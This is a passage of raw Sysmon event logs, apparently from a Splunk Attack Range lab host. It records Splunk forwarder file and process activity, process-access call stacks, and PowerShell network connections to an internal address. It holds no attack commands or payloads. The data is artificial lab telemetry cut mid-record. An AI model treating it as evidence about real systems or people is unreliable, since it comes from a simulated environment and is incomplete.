Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B34A47893DC381CC05EA067D1AE5E2E3,SHA256=198D559A2A935184A34BB9739F76F58F90A952057AA0483CC47B022B79699070,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C493A923970EED97D910E9A33A4A64B9,SHA256=C82A795C009EB07B0921062B9637920818D78AE98FB9CF2FD6FFE94A2D81CB0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.160{B81B27B7-4013-611D-1600-00000000C801}1196356C:\Windows\system32\svchost.exe{B81B27B7-7456-613B-63B4-03000000C801}4820C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.148{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7456-613B-63B4-03000000C801}4820C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.135{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7456-613B-63B4-03000000C801}4820C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:58.134{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7456-613B-63B4-03000000C801}4820C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:59.563{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D06826977C1E3438FFF1D7729CBFD0D,SHA256=ACF778C12855F2861EA5CE6B54194E4868FF3021139F411B7E792B1EB4A68133,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:59.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE171010072A0826BDEA52ABC89C3CCE,SHA256=19F2B998729E725E0C9952ED5EDA6FD09686FB733D99E27FCDDF23F106A288A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:26.355{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52580-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:00.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D8C33D3A17CE3855F3B81C28863C302,SHA256=27C3D7806476A82B775B3839035FA864F7D8766A1D5E63197D5045B32F62BD23,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:00.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1EC94A48D4FC44B112B1EC6682C7B5C5,SHA256=FE3460F75C854A592F39D6BE1AEE7AAB64FA2D169D921D65554518BE7D5EFB52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:01.613{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAE62A8CAC2F1B401ED39CB11AEEC06,SHA256=D43A95B9D5F6DE8F9BB52F3ADEFCA789938A688B81374A78E1A5FA86EF037772,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:27.152{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52581-false10.0.1.12-8000- 23542300x800000000000000035343677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:02.628{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3541CF23AA83CCB58B6D53E4B7412D2,SHA256=72C06EAEA3E0D18C65EADA7431F72DED66B1E7ACC0A8ECCE43CB0DCEF7808638,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:03.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC09F9CE7138D0C52C9DB91437D10B5,SHA256=F0B5E7D8464667DC76CC16CA0EE03D4A0500827A9AA4B1FE43F11A464873AC65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:30.365{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52582-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CBB1CCEAD318A3C981101A68B81E730,SHA256=5B10633D54145F9D047A653E7688A2B3A706CF49226F498D18E49F6100B69958,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-745C-613B-65B4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-745C-613B-65B4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.643{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-745C-613B-65B4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.628{B81B27B7-745C-613B-65B4-03000000C801}1016C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.558{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E0CC1EF102D1F502606025F7AC144AF0,SHA256=2E2ECBFD15893B6864D0B1F7285D873EB5A730AED2B5CA2942A39357AEFFD7E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.190{B81B27B7-745C-613B-64B4-03000000C801}47565172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-745C-613B-64B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-745C-613B-64B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.043{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-745C-613B-64B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:04.031{B81B27B7-745C-613B-64B4-03000000C801}4756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 